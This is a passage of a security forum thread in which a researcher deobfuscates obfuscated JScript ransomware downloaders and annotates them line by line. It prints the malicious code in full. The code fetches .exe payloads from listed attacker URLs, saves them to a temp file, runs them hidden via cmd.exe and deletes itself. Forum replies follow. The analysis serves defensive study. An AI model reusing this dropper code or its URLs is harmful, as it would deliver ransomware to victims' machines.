=> new ActiveXObject("Wscript.Shell")
=> shell object : for the run part (see below)

​

var dwe = YjS(Pt);

​

function YjS(GgD)
{

var wC = new GgD(QRO("35232A193A6A6C0107742C333529","xprTvXBYJ8dgay32zvNLN6fbbvJp1XV6w4U5BuhZ4MyPZyDCytLJ8Ls0WrItDcADtEzeOiEKgUjKGhcs"));
=> new ActiveXObject("MSXML2.XMLHTTP")
return wC;​

}

​

=> new ActiveXObject("MSXML2.XMLHTTP")
=> http object for the request

​

var bC=[];
bC[0]="emO";
bC[1]="ile";
bC[2]="in";
bC[3]="ect";
bC[4]="st";
bC[5]="bj";
bC[6]="g";
bC[7]="Sy";
bC[8]="ipt";
bC[9]="Scr";
bC[10]=".F";
var npT=bC[9]+bC[8]+bC[2]+bC[6]+bC[10]+bC[1]+bC[7]+bC[4]+bC[0]+bC[5]+bC[3];

=> "Scripting.FileSystemObject"

​

var dSF = new Pt(npT);

=> new ActiveXObject("Scripting.FileSystemObject")

=> FSO object to manipulate the files / folder / path
​

if (jGP(dwe, Tib) == 0)

​

=> try to retrieve the data from the URL
=> parameters : the http object to make the request, and the URL

Spoiler: details

function jGP(OF, qnI)
{

var mD=[];
mD[0]="5o";
mD[1]="aL";
mD[2]="R";
mD[3]="R";
mD[4]="b0K";
mD[5]="gh";
mD[6]="mC";
mD[7]="qdn";
mD[8]="L9p";
mD[9]="A";
mD[10]="WKH";
mD[11]="Au";
mD[12]="yn";
mD[13]="7";
mD[14]="b";
mD[15]="70";
mD[16]="eW";
mD[17]="e75";
mD[18]="mY";
mD[19]="qK";
mD[20]="ZZH";
mD[21]="h3";
mD[22]="I";
mD[23]="f";
mD[24]="8D";
mD[25]="hLx";
mD[26]="48i";
mD[27]="P";
mD[28]="mhZ";
mD[29]="seO";
mD[30]="N";
mD[31]="s";
mD[32]="s";
mD[33]="kcI";
mD[34]="U9N";
mD[35]="fyP";
var JnJ=mD[28]+mD[21]+mD[19]+mD[8]+mD[5]+mD[10]+mD[6]+mD[1]+mD[15]+mD[12]+mD[18]+mD[32]+mD[25]+mD[13]+mD[26]+mD[14]+mD[23]+mD[16]+mD[24]+mD[0]+mD[33]+mD[17]+mD[20]+mD[29]+mD[7]+mD[2]+mD[31]+mD[34]+mD[30]+mD[35]+mD[27]+mD[11]+mD[4]+mD[22]+mD[9]+mD[3];

=> passord_1 : for XOR part "mhZh3qKL9pghWKHmCaL70ynmYshLx748ibfeW8D5okcIe75ZZHseOqdnRsU9NNfyPPAub0KIAR"

​

var Cpn="";
Cpn=Cpn+J(825-771)+J(24*3)+J(10230/93-0)+J(45+55)+J(922-846)+J(7*11)+J(53)+J(824-722)+J(244-127)+J(4*13)+J(85-38)+J(336-228)+J(2244/22+0)+J(3+86)+J(4*19)+J(32*2)+J(3*17)+J(2616/24+0)+J(5*11)+J(182-96)+J(4048/46+0)+J(327-256)+J(2349/29+0)+J(793-697)+J(10764/92+0)+J(55+32)+J(67)+J(713-629)+J(3648/48-0)+J(10*7)+J(89)+J(367-319)+J(262-184)+J(8*7)+J(1188/22+0)+J(25+92)+J(7*7)+J(334-269)+J(16*5)+J(2231/23-0)+J(3*17)+J(72+3)+J(116/1+0)+J(6375/85+0)+J(4225/65-0)+J(315-198)+J(707-634)+J(1825/25-0)+J(907-803)+J(3213/63-0)+J(7110/90+0)+J(586-532)+J(875-767)+J(4446/39-0)+J(387-290)+J(38+68)+J(8+90)+J(53)+J(886-767)+J(2380/35-0)+J(108+1)+J(5664/59-0)+J(46+70)+J(4757/67-0)+J(2773/59-0)+J(360/3-0)+J(7*11)+J(400/4-0)+J(90+10)+J(266-159)+J(70+14)+J(741-661)+J(8*7)+J(550/5-0)+J(51+70);

=> pasword_2 : for XOR part "7IoeMN6gv50mgZMA4n8WYHRavXDUMGZ1O97v2BQb4LuLBvJJi4P7msbkc6xEnauH0yNeelUQ9oz"

​

var tkc=207953;
var aJJ=tkc+19575;
var CF=aJJ/476;
var xgH=CF-478;

OF[QRO("02183F06",JnJ)](QRO("700C3B",Cpn), qnI, xgH);

=> http["open"]("GET", "http ://www .interlaan.com/deklar_11222016.exe, 0)
​

try {

OF[QRO("1B202D53","hEC7c7RW7l7RcuyQeaHB1yOcRt8hth0hzTpnWp54znW0WJrFDAdcAnUJe5ud6Lag2oK0ud")]();

=> http["send"]()
=> http.send()
=> send the request !

​

} catch (WKY) {
return 0;
}
return 1;​

}

return false;

var cOv="";
cOv=cOv+J(41*2)+J(9+106)+J(1536/16+0)+J(693-578)+J(11136/96+0)+J(912/8+0);

=> "Status"

​

var sn = dwe[cOv];

=> http.status

​

var Xdq=412883;
var leM=Xdq+43957;
var Gcb=leM/405;
var NC=Gcb-928;

var haS = NC;

=> haS = 200 => When the request is OK (HTTP_OK)

​

if (sn == haS) {

=> sn == 200 ?
=>if true : the following part is run
var IxV="";
IxV=IxV+J(448/7-0)+J(67)+J(648-570)+J(67)+J(5*13)+J(4+41)+J(41*2)+J(5*23)+J(432-319)+J(84+16)+J(32*3)+J(490-382);

=> "ADODB.Stream"

​

var gib = new Pt(IxV);

=> new ActiveXObject( "ADODB.Stream")
=> create a stream object, to handle the data received

​

var SW = VNB(dSF);

=> calls VNB function with the FileObjectSystem as parameter
=> returns the path to be used :
=> Example : "C:\\Users\\DardiM\\AppData\\Local\\Temp\\radDFC2C.tmp"

The function uses :128["charAt"](256) to make an error occurs, and redirect the script on the catch part,that is the part to deal with errors. But here normal codes is inside this part.

=> it tries to read the char at index 256 inside the number 128... hahaha ​

function VNB(AK)
{
    var kO=118956;
    var ApS=kO+55044;
    var ELV=ApS/580;
    var htB=ELV-172;
    var LPh = htB;
    var UuE="";
    UuE=UuE+J(109)+J(1650/15-0)+J(5*23);
    => "not"
 
    var xw = UuE;
    try
    {
        var ux="";
        ux=ux+J(7*13);
        => "\\"
 
        var KUe="";
        KUe=KUe+J(10*7)+J(419-319)+J(5*23)+J(684-601)+J(20*5)+J(657-549)+J(321-210)+J(784-707)+J(32*3)+J(6480/60-0)+J(1500/15+0);

        => "GetTempName"
 
        xw = ux + AK[KUe]();

        => "\\radDFC2C.tmp"
 
        var xZz="";
        xZz=xZz+J(452-354)+J(284-181)+J(32*3)+J(97+16)+J(1408/22-0)+J(5*23);

        => "charAt"
 
        var Pz=660305;
        var Rlj=Pz+62830;
        var pgJ=Rlj/679;
        var eSw=pgJ-809;
        xw = xw + LPh[xZz](eSw);

        => generate an error : LPh[xZz](eSw) : 128["charAt"](256)
                     
        // never used parts
        var Yv="";
        Yv=Yv+J(136/2-0)+J(716-618)+J(63+40)+J(577-467);
        =>              
        var VUK=[];
        VUK[0]="d3";
        VUK[1]="dah";
        VUK[2]="s";
        VUK[3]="h";
        VUK[4]="663";
        VUK[5]="asg";
        VUK[6]="g";
        VUK[7]="dh";
        var Sq=VUK[7]+VUK[5]+VUK[3]+VUK[0]+VUK[4]+VUK[6]+VUK[1]+VUK[2];
        => "dh" + "asg" + "h" + "d3" + "663" + "g" + "dah" + "s"
        => no "mean"
 
        WScript[Yv](Sq);
    }
    catch (Ms)
    {
    => the error that is made voluntarily make the script reaches here
 
        var rd="";
        rd=rd+J(742-676)+J(271-158)+J(16+84)+J(82+14)+J(75+40)+J(3800/38-0)+J(67+11)+J(8+89)+J(15*7)+J(539-439)+J(392/4+0)+J(4600/40+0);

        => "CreateObject"
 
        var rOs="";
        rOs=rOs+J(40+46)+J(4+78)+J(9310/95-0)+J(495-382)+J(70+34)+J(3*37)+J(34+81)+J(9*5)+J(64+13)+J(48+52)+J(5*23)+J(59*2)+J(143-33)+J(2034/18-0)+J(954/9-0);

        => "WScript.Network"
 
        var OxT = WScript[rd](rOs);

        => WScript.CreateObject("WScript.Network")
 
        var CFm="";
        CFm=CFm+J(12*7)+J(3192/28+0)+J(33+67)+J(683-570)+J(65+2)+J(27+83)+J(9396/87+0)+J(3648/38-0)+J(446-342)+J(109);

        => "UserDomain"
 
        var Wl = typeof OxT[CFm];

        => get user domain : "DESKTOP-DARDIMPC"
 
        var uL="";
        uL=uL+J(860-746)+J(2530/22+0)+J(113)+J(8*13)+J(109)+J(9384/92-0);

        => "string"
 
        var KDf = uL;
        if (Wl == KDf)
        {
        =>  two Strings ?
 
            var rC=55817;
            var EZO=rC+11587;
            var BN=EZO/82;
            var SC=BN-819;
            var JeR = SC;
            var kP="";
            kP=kP+J(747-677)+J(8700/87-0)+J(5*23)+J(41*2)+J(837-726)+J(20*5)+J(14*7)+J(5720/55+0)+J(32*3)+J(107)+J(759/11-0)+J(102+8)+J(94+13)+J(2+97)+J(20*5)+J(113);

            => "GetSpecialFolder"
 
            var acD=607;
            var lru=acD+3401;
            var NK=lru/4;
            var IW=NK-1000;
            xw = AK[kP](IW) + xw;
 
            => "C:\\Users\\DardiM\\AppData\\Local\\Temp\\radDFC2C.tmp"
        }
        else
        {
            var gA=472398;
            var nh=gA+23328;
            var dU=nh/518;
            var rkq=dU-947;
            var JeR = rkq;
            var CU=[];
            CU[0]="S";
            CU[1]="pec";
            CU[2]="Get";
            CU[3]="e";
            CU[4]="r";
            CU[5]="F";
            CU[6]="old";
            CU[7]="ial";
            var di=CU[2]+CU[0]+CU[1]+CU[7]+CU[5]+CU[6]+CU[3]+CU[4];

            => "GetSpecialFolder"
 
            var bDo=254595;
            var hxj=bDo+51425;
            var IkN=hxj/535;
            var fg=IkN-571;
            xw = AK[di](fg) + xw;
        }
    }
    return xw;
}

var qU="";
qU=qU+J(70+8)+J(42+69)+J(2400/24-0)+J(109);

=> "Open"

​

gib[qU]();

=> stream["Open"]()
=> stream.Open()
=> opens the stream object, to be able to use it

​

var cY="";
cY=cY+J(83)+J(24*5)+J(4884/44+0)+J(43+57);

=> "Type"

​

var MzJ=13231;
var hZ=MzJ+16865;
var CAg=hZ/48;
var By=CAg-626;
gib[cY] = By;

=> stream["Type"] = 1 : binary data : the data that will put inside will be considered as binary data

​

var yu="";
yu=yu+J(54+27)+J(20*5)+J(6*19)+J(7881/71-0)+J(10*11)+J(8720/80-0)+J(11+103)+J(1600/16+0)+J(275-210)+J(75+35)+J(9*11)+J(27+93);

=> "ResponseBody"

​

var yzh = dwe[yu];

=> var yzh = http.ResponseBody
=> Array of bytes with the data received from the http request

​

var DZy="";
DZy=DZy+J(43*2)+J(923-810)+J(8*13)+J(94+21)+J(20*5);

=> "write"

​

gib[DZy](yzh);

=> stream["write](yzh)
=> writes in the stream object the data received (temporary saved on yzh var)

​

var Am="";
Am=Am+J(69+10)+J(33+77)+J(6156/54-0)+J(89+15)+J(25+90)+J(416/4+0)+J(90+20)+J(109);

=> "Position"

​

var lm=260605;
var YU=lm+50275;
var Ny=YU/580;
var LC=Ny-536;

=> LC= 0
​

gib[Am] = LC;

=> stream["position"] = 0
=> after the call of the write, the position has changed : set to 0

​

if (!WN(gib, SW, Pt))
=> calls a function that try to save the data on a file
=> WN(stream , PATH, ActiveXObject)
return false;

Details of WN function :

Uses an "ADODB.Recordset" object :

The ADO Recordset object is used to hold a set of records from a database table. A Recordset object consist of records and columns (fields).

details : ADO Recordset Object​

- adds the data from the stream object to the record, and read the data from the record,to get the size
(this method can be use to convert data type, but here, data received are put on a stream with data type : binary => no changes)
Finally saves the data to a file ( random name using GetTempName) :
Example : "C:\Users\DardiM\AppData\Local\Temp\radDFC2C.tmp"

function WN(gV, Jp, LAe) // Stream, "C:\\Users\\DardiM\\AppData\\Local\\Temp\\radDFC2C.tmp", ActiveXObject
{
    var TOw=376387;
    var LH=TOw+46238;
    var XCe=LH/735;
    var sM=XCe-565;
    var DC = sM;

    var Qbv="";
    Qbv=Qbv+J(605-524)+J(89+11)+J(960/10+0)+J(4356/44+0);

    => "Read"
 
    var Ld = gV[Qbv]();

    => Stream.Read()
    => array of bytes : payload binary data
 
    var tv="";
    tv=tv+J(232-150)+J(9152/88-0)+J(728-607)+J(898-798);

    => "Size"
 
    var Hx = gV[tv];

    => Stream.size => size written : 924410
 
    var bP=444811;
    var NUC=bP+14609;
    var nPH=NUC/620;
    var NoG=nPH-540;
    var etf = NoG;
    var rx="";
    rx=rx+J(832/13-0)+J(547-480)+J(6*13)+J(6633/99-0)+J(5*13)+J(6+39)+J(1701/21+0)+J(2000/20+0)+J(8624/88+0)+J(10*11)+J(88+25)+J(9+90)+J(44+70)+J(7500/75-0)+J(10120/88-0);

           => "ADODB.Recordset"

          =>  see : https://msdn.microsoft.com/en-us/library/ms681510(v=vs.85).aspx
 
    var SFa = new LAe(rx);

    => new ActiveWObject("ADODB.Recordset")                              
 
    var SfA="";
    SfA=SfA+J(27+70)+J(8*13)+J(76+33);

    => "bin"
                                  
    var OB = SfA;
    var PbB="";
    PbB=PbB+J(101)+J(428-324)+J(4500/45+0)+J(107)+J(0+99)+J(6*19);

    => "fields"
 
    var Yb="";
    Yb=Yb+J(32*3)+J(11100/100+0)+J(32+79)+J(27+73)+J(65+44)+J(355-256);

    => "append"
 
    SFa[PbB][Yb](OB, etf, Hx);

    => RecordeSet Object
    => RecordeSet["fields"]["append"]("bin",201,924410)
    => Type 201 : adLongVarChar    Memo (Access 97) Hyperlink (Access 97)    Text     
 
    var CFg="";
    CFg=CFg+J(59+51)+J(3*37)+J(20*5)+J(109);

    => "open"
 
    SFa[CFg]();

    => RecordeSet["open"]
 
    var ZJ="";
    ZJ=ZJ+J(350-254)+J(738-639)+J(9*11)+J(7*11)+J(589-489)+J(15+103);

    => "addNew"
    => After you call the AddNew method, the new record becomes the current record and remains current after you call the Update method.
 
    SFa["addNew"]();
 
    var XmR="";
    XmR=XmR+J(72+24)+J(340-229)+J(6882/62-0)+J(128-28)+J(71+38)+J(541-442)+J(60+6)+J(25+78)+J(4*29)+J(109)+J(53*2);

    => "appendChunk"
 
    SFa(OB)[XmR](Ld);
    recordeSet("bin")["appendChunk"](stream)

    => Appends data to a large text or binary data Field, or to a Parameter
 object.
    => the binary data received : payload
 
    var BC="";
    BC=BC+J(72+44)+J(757-646)+J(8712/88-0)+J(429-333)+J(786-671)+J(7400/74-0);

    => "update"
 
    SFa[BC]();
    var LvZ="";
    LvZ=LvZ+J(9*13)+J(32*3)+J(397-290)+J(950-834)+J(20*5);
 
    => "value"
 
    Ld = SFa(OB)[LvZ];
 
    => retrieve the "bin" value : the data     
    => RS.bin["value"]
 
    var wJ="";
    wJ=wJ+J(214/2-0)+J(20*5)+J(995-886)+J(33+69)+J(5*23)+J(2+101);
 
    => "length"
 
    var Coz = Ld[wJ];
    
    => retreive the lenght of data

    if (Coz > DC)
    => 924410 > 10
    {
        var los="";
        los=los+J(75+7)+J(576/6+0)+J(9*13)+J(50+50)+J(83)+J(68+42)+J(222-153)+J(611-507)+J(107)+J(302-202);

        => "SaveToFile"
 
        gV[los](Jp);

        => Stream["SaveToFile"](jp)

=> Example : ("C:\\Users\\DardiM\\AppData\\Local\\Temp\\radDFC2C.tmp")
 
        return true;
    }
    else return false;
}

var iSG="";
iSG=iSG+J(6*11)+J(1087-980)+J(5060/46-0)+J(645-531)+J(699-599);

=> "Close"

​

gib[iSG]();

=> stream["Close"]()
=> stream.close()
=> close the stream object (this object has done is job : closed)

​

var Ep="";
Ep=Ep+J(3626/37-0)+J(1108-1000)+J(44+55)+J(2475/55+0)+J(23+77)+J(5355/45+0)+J(2100/21-0)+J(21+10)+J(3036/66-0)+J(2548/26-0)+J(1984/64-0);

=> "cmd.exe /c "

​

var ZzY = Ep + SW;
var ybc=118986;
var NI=ybc+11627;
var fi=NI/397;
var UF=fi-329;
var IIZ = UF;
var Vp=[];
Vp[0]="y7a";
Vp[1]="nd";
Vp[2]="sjh";
Vp[3]="gfs";
Vp[4]="qm";
Vp[5]="dh";
Vp[6]="as";
Vp[7]="fs";
var Jdv=Vp[6]+Vp[4]+Vp[1]+Vp[2]+Vp[0]+Vp[3]+Vp[5]+Vp[7];

=> "asqmndsjhy7agfsdhfs"

​

var ft="";
ft=ft+J(920-872)+J(5+43)+J(4214/86-0)+J(10*5);

=> "1123"

​

IIZ = ygJ(Jdv, Pt, ZzY, ft);

Spoiler: details

function ygJ(ng, LAe, tC, xnW)
{

var JC="";
JC=JC+J(4066/38+0)+J(93+7)+J(3488/32+0)+J(4386/43-0)+J(5*23)+J(94+9);

​

=> "length"

var iSL = ng[JC];

​

=> length of "asqmndsjhy7agfsdhfs"

var Jnf=279668;
var EQQ=Jnf+15258;
var HB=EQQ/478;
var ubH=HB-610;
var dUR = ubH;
var sDM=402607;
var Ko=sDM+39011;
var RI=Ko/827;
var tU=RI-529;
var Nk = tU;
var CWg = xnW;
if (iSL == dUR) => 19 == 7
{

var iUx="";
iUx=iUx+J(416-303)+J(774-658)+J(6213/57+0);

=> "run"

​

CWg = iUx;​

}
if (iSL == Nk) => 19 == 5
{

var FL = iSL * Nk;

=> 25

​

return JK(FL, LAe, tC, xnW);

=> end of recursive calls !
=> calls another function (I will who it below)​

}
var NW="";
NW=NW+J(605-491)+J(942-826)+J(97)+J(456/4-0)+J(9775/85-0)+J(113)+J(7592/73-0)+J(804-695)+J(20+82);

=> "substring"

​

var BY=250521;
var FPm=BY+40485;
var kA=FPm/317;
var pHz=kA-918;
var zD=1065;
var em=zD+11871;
var fx=em/616;
var Tk=fx-20;
var jXy = ng[NW](pHz, iSL - Tk);

=>"asqmndsjhy7agfsdhfs".substring(0, 19 - 1 )

​

return ygJ(jXy, LAe, tC, CWg);

=> "asqmndsjhy7agfsdhf"
=> ActiveXObject
=> "cmd.exe /c C:\\Users\\DardiM\\AppData\\Local\\Temp\\rad36D41.tmp" => "1123"

=> recursive calls !​

}

​

=> A RECURSIVE FUNCTION
=> this big function calls itself several times until some values are reached
=> the big string is modified at each call

"asqmndsjhy7agfsdhfs"
"asqmndsjhy7agfsdhf"
"asqmndsjhy7agfsdh"
"asqmndsjhy7agfs"
"asqmndsjhy7agf"
...
...
"asqmnds"

=> then it uses some real part

if (iSL == dUR) => iSL == 7
{

var iUx="";
iUx=iUx+J(416-303)+J(774-658)+J(6213/57+0);

=> "run"​

CWg = iUx;​

}

​

"asqmn"

=> then it uses some real part

​

if (iSL == Nk) => iSL == 5
{

var FL = iSL * Nk;
=> 25
return JK(FL, LAe, tC, xnW);

- parameter 1 : 25
- parameter 2 : ActiveXObject
- parameter 3 : command line

=> Example : "cmd.exe /c C:\\Users\\DardiM\\AppData\\Local\\Temp\\rad36D41.tmp"
​

- parameter 4 : "run"

​

=> the real returns ! recursive calls ended​

}

​

Let's see JK function :

​

....................
function JK(rch, LAe, tC, xnW)
{

var xUj=85687;
var oEC=xUj+61733;
var se=oEC/364;
var hP=se-405;
var saL = hP;

=> saL = 0 : ((85687+61733) / 364) - 405
​

if (rch > saL) => always true : 25 > 0
{

rch = saL;

=> rch = 0 : intWindowStyle that will be used for the run part, second parameter
=> to hide the window​

}
var XJ = QRO("32290802101215242C1D01","ANlhxsfCDykvurcqjY4RRqr9m5mh5FlojeGYDzFGG37989hSeNYp8K699X6IbQAe945t6BVJfyf74i");

=> "sgdjhasghdj"

var GNY="";
GNY=GNY+J(810-712)+J(25+28)+J(9*13)+J(7*17)+J(3230/38-0)+J(1073-991)+J(16*5)+J(8228/68+0)+J(595-493)+J(253-149)+J(706-655)+J(76+33)+J(6180/60-0)+J(16*3)+J(10*5)+J(7+45)+J(747-648)+J(489-407)+J(4200/42+0)+J(7584/96-0)+J(162-113)+J(1+64)+J(1060-958)+J(40+41)+J(239-136)+J(45+21)+J(1079-975)+J(16*7)+J(7280/70-0)+J(7+62)+J(63+17)+J(101)+J(3744/78-0)+J(279-201)+J(1072-972)+J(543-461)+J(5253/51-0)+J(409-306)+J(87-10)+J(1054-939)+J(71)+J(32+32)+J(5310/45-0)+J(20+55)+J(823-713)+J(866-762)+J(637-524)+J(5700/75-0)+J(234-164)+J(26+27)+J(73)+J(5412/66-0)+J(29+57)+J(634-533)+J(3*37)+J(47)+J(4250/50+0)+J(481-375)+J(10*5)+J(10*7)+J(65+46)+J(6902/58+0)+J(7*17)+J(632-566)+J(3685/55-0)+J(21+35)+J(231-164)+J(82+27)+J(5106/69+0)+J(741-633)+J(52+2);

​

=> "c6vxVSQzgi4nh135dSeP2BgRhCiqiFQf1OeShhNtHAwLoirMG6JSWfp0Vk3GpxxCD9DnKm7"

XJ = new LAe(QRO("3445150A3F2325543401510204",GNY));

​

=> uses the QRO function (decoder)
=> new ActiveXObject("Wscript.Shell")

XJ[xnW](tC, rch);

=> xnW = "run"
=> rch = 0 : hide the window (and active another)
=> Shell.run (commande line,0)
=> run the payload

​

var ez=2842;
var DDn=ez+749;
var gm=DDn/21;
var ihg=gm-163;
var xw = ihg;
return xw;

=> always returns 8 !!!​

}

​

var gL=146016;
var anP=gL+63364;
var qXw=anP/361;
var mlA=qXw-570;
var qvO = mlA;

=> 10 : ((146016+63364)/361) - 570)

​

if (IIZ < qvO)

=> here, IIZ is always equal to 8 and qvO equal to 10

{

return BSu(dSF);

=> deletes the current running script file

​

Spoiler: Delete the script in use

function BSu(WZr, Svj) => 2nd parameters useless
{

var Xh=[];
Xh[0]="M";
Xh[1]="9";
Xh[2]="fxj";
Xh[3]="E";
Xh[4]="4";
Xh[5]="OZ";
Xh[6]="3";
Xh[7]="ZE";
Xh[8]="9i";
Xh[9]="hj";
Xh[10]="e0S";
Xh[11]="g";
Xh[12]="ml";
Xh[13]="Ad9";
Xh[14]="5X";
Xh[15]="J";
Xh[16]="U";
Xh[17]="rb";
Xh[18]="7oZ";
Xh[19]="3e";
Xh[20]="yr7";
Xh[21]="ug";
Xh[22]="Ux";
Xh[23]="s";
Xh[24]="3f2";
Xh[25]="s4";
Xh[26]="u";
Xh[27]="Jj";
Xh[28]="noU";
Xh[29]="KLh";
Xh[30]="lbO";
Xh[31]="E";
Xh[32]="w";
Xh[33]="t";
Xh[34]="rJ";
Xh[35]="3L";
Xh[36]="V";
Xh[37]="3g";
Xh[38]="5T";
Xh[39]="Kn";
Xh[40]="m";
Xh[41]="1Wl";
var ms=Xh[22]+Xh[0]+Xh[4]+Xh[19]+Xh[28]+Xh[8]+Xh[10]+Xh[37]+Xh[3]+Xh[38]+Xh[36]+Xh[5]+Xh[27]+Xh[17]+Xh[1]+Xh[35]+Xh[31]+Xh[11]+Xh[20]+Xh[16]+Xh[21]+Xh[26]+Xh[30]+Xh[7]+Xh[2]+Xh[32]+Xh[29]+Xh[12]+Xh[14]+Xh[18]+Xh[34]+Xh[25]+Xh[15]+Xh[40]+Xh[41]+Xh[6]+Xh[9]+Xh[24]+Xh[39]+Xh[13]+Xh[23]+Xh[33];

=>"UxM43enoU9ie0S3gE5TVOZJjrb93LEgyr7UugulbOZEfxjwKLhml5X7oZrJs4Jm1Wl3hj3f2KnAd9st"
​

var LN = eval(QRO("022B2E465A151A",ms));

=> QRO => eval("WScript")
=> LN : WScript
​

var kQ = LN[QRO("303A085F124D03232E200451065D","cYz6b9EVBLJ0k8wposUSED3bw02Cp6bI71mjcMnF7UfKxD6eFo6FO0VMpgcaENpyl8U5EdriaX0jZ")];

=> "ScriptFullName"
=> WScript["ScriptFullName"]
=> "J:\\ANALISE\\23-11-2016#20 (1)\\Документы и декларация на товар 11222016.js"

​

var EB="";
EB=EB+J(557-440)+J(8036/98-0)+J(6630/65+0)+J(28+70)+J(1+55)+J(9752/92-0)+J(2795/43+0)+J(49+72)+J(38+42)+J(26+93)+J(757-660)+J(10*7)+J(73)+J(2+52)+J(5184/64-0)+J(944-892)+J(2544/48-0)+J(79)+J(6783/57+0)+J(4620/70+0)+J(10+55)+J(7*11)+J(324-250)+J(1173/23-0)+J(7*17)+J(4+100)+J(579-478)+J(48+16)+J(35+65)+J(6351/73-0)+J(3552/37-0)+J(420-341)+J(852-750)+J(35+39)+J(6*17)+J(15*7)+J(213-113)+J(7*17)+J(3+61)+J(109)+J(1024-936)+J(37+30)+J(8*7)+J(10*7)+J(6*11)+J(83)+J(4*19)+J(9*11)+J(455/7+0)+J(21+80)+J(65+44)+J(90+15)+J(78+7)+J(4*17)+J(109)+J(16*3)+J(2*37)+J(8+70)+J(192/2+0)+J(76+24)+J(1488/31-0)+J(47)+J(929-881)+J(8200/100+0)+J(21+32)+J(6*11)+J(8*13)+J(73)+J(31+74)+J(9630/90+0)+J(490-383);

​

=> "vSgc9kBzQxbGJ7R56PxCBNK4xifAeXaPgKgjexAnYD9GCTMdBfnjVEn1KOae101S6CiJjll"
​

WZr[QRO("12360B064D0E04133D1D",EB)](kQ);

​

=> Shell["deleteFile"]("J:\\ANALISE\\23-11-2016#20 (1)\\Документы и декларация на товар 11222016.js")

​

return true;​

}

}
else
{

return false;​

}

}​

else {

return false;​

}
return true;​

}

​

3) Conclusion :

- very big puzzle games

Документы и декларация на товар 11222016.js

URLs :

- http ://www .interlaan.com/deklar_11222016.exe
- http ://dipudevaraj.com/deklar_11222016.exe

​

Payload : shade ransomware , extension : .NO_MORE_RANSOM

"cmd.exe /c C:\Users\DardiM\AppData\Local\Temp\rad36D41.tmp"
7/55
Antivirus scan for 32bd4f2d2c33b037e0208d60ec3806bcba94a4ddaf3662b758c7340179b68f17 at 2016-11-22 18:30:54 UTC - VirusTotal
https://www.hybrid-analysis.com/sam...4ddaf3662b758c7340179b68f17?environmentId=100​

​

начисления_xls.js

URLs :

- http ://grandfather.com/wp-content/themes/divi-child/helpsys.exe
- http ://agxlogistics.com/modules/mod_araticllws/helpsys.exe

=> Payload already not available

"cmd.exe /c C:\Users\DardiM\AppData\Local\Temp\rad00969.tmp"​

=> remember this is a random name returned by GetTempName function

• The main difference with Документы и декларация на товар 11222016.js

The function called in the if part (remember, the main part)

function A(OAa)
{

var Z = eval("ActiveXObject");
var temp = Yx();

=> "ADODB.Recordset" (and not "ADODB.Stream")

​

var QWi = new Z(Yx());

=> QWi = ActiveXObject("ADODB.Recordset")
=> Creates an ActiveX object : ADO Recordset

"The ADO Recordset object is used to hold a set of records from a database table. A Recordset object consist of records and columns (fields)"

details : ADO Recordset Object

​

var ach = rT();

=> ach = "object"

​

var cY="";
cY=cY+G(58+58)+G(75+34)+G(7738/73+0)+G(15+94)+G(10*11)+G(59*2)+G(5668/52+0);

=> "unknown" (here, the function G is similar to the J function of previous sample)

​

var Rd = cY;
var E = (typeof QWi[iHx()] == ach);

=> iHx() : "fields"
=> is typeof QWi["fields"] == "object" ?

=> We have seen that: QWi = ActiveXObject("ADODB.Recordset")

=> var E = true is running under the good environment

​

=> the string cY, "unknown", is not used ! They forgot to delete this part, when modifying the script !?

​

return E;

=> true or false : result of above test : true if under the good environment.​

}​

 

[DardiM]

Once again, fighting against the formatting bugs ... (that delete, etc, some formatting)
Sorry for the inconvenience.

 

[tim one]

Thank you, very hard work!

 

[Der.Reisende]

Very well done @DardiM, highly appreciated! Kudos!

 

[DardiM]

Thank you, very hard work!

Very well done @DardiM, highly appreciated! Kudos!

Thanks

 

[AtlBo]

I see malware writers/hackers are not programmers after all. They are puzzle makers!

So may I assume the puzzle is to avoid detection and not for the amusement of our puzzle solver DardiM? I am very new to reading script, although I can "follow" your analyses. I am not a programmer.

Really outstanding effort and work decoding this puzzle. I hope it inspires some would be security programmers.

 

[DardiM]

I see malware writers/hackers are not programmers after all. They are puzzle makers!

So may I assume the puzzle is to avoid detection and not for the amusement of our puzzle solver DardiM? I am very new to reading script, although I can "follow" your analyses. I am not a programmer.

Really outstanding effort and work decoding this puzzle. I hope it inspires some would be security programmers.

Thanks

So may I assume the puzzle is to avoid detection
Yes, that is completely the right reason
=> the less there are understandable "strings" / parts (some well known), the less easy it will be for static detection (heuristic, or human analyse)

 

[DardiM]

From https://malwaretips.com/threads/13-01-2016-22.67512/
Thanks to @Der.Reisende

Another sample from the same family.
These sample are very long puzzles, if we enter in the details of each part.
That is why I will now only show important parts / results (please, refresh your memory reading the previous posts about how it works)

1) The Main part :

The main decoder function : Eo( encoded_string , password)

=> remember this function name ​

• if (wbn())

=> calls the function that will test if we are under the wanted environment
{

• var cNQ = [];

=> creates the empty tab for the future URLS : they are currently encoded.​

// declaration of a function that will decode the first URL
function fW() {

var RU=Eo("30473C13437A691512431B042B59250425355A3C061D7B25161E191A14364C3A012276563006","X3HcyUFys6imE8MhL");
return RU;​

}​

• cNQ[eval("0")] = fW();

=> eval("0") = > 0 = index used to put the resukt od fW() call

=> cNQ[0] = URL1 => out in the tab, at index 0, the first URL where to download the payload from.

URL1 : hxxp://laurinahlimited.com/systwin.exe​

// declaration of the function that will give the password to be used by the main decoder
function NW() {

var bk = "";
bk=bk+uHh(6527/61-0)+uHh(303/3-0)+uHh(65+17)+uHh(65+12)+uHh(36*3)+uHh(7738/73-0)+uHh(43*2)+uHh(11*11)+uHh(936-856)+uHh(13+55)+uHh(3952/76-0);
return bk;​

}
// declaration of the function that will give the index used to store the second decoded URL
function eeN() {

var zBP=Eo("5D",NW());
return zBP;​

}
// declaration of the function that will give the password to be used by the main decoder
function UM() {

var gFP = "";
gFP=gFP+uHh(728-640)+uHh(29+77)+uHh(3888/81-0)+uHh(301-185)+uHh(3381/69+0)+uHh(8888/88+0)+uHh(748-661)+uHh(391-286)+uHh(31+39)+uHh(218-154)+uHh(597-542)+uHh(41+80)+uHh(3*23)+uHh(97)+uHh(27+46)+uHh(79)+uHh(84+1);
return gFP;

=> "Yk1u2fXjGA8zFbJPV"​

}
// declaration of a function that will decode the second URL used, using thee password returned by UM()
function lo() {

var jI=Eo("311F4505084977072E2D590C2F16393164684543001D1521193336511468073235",UM());
return jI;​

}​

• cNQ[eval(eeN())] = lo();

=> calls lo() => second URL => put this URL in the tab of URLs cNQ, at the index given by eeN() : return 1

UrL2 : hxxp://milavitsa21.ru/systwin.exe​

• var yk = false;

=> will be used on the while loop (where the different URLs can be used to download, save, run, the payload)
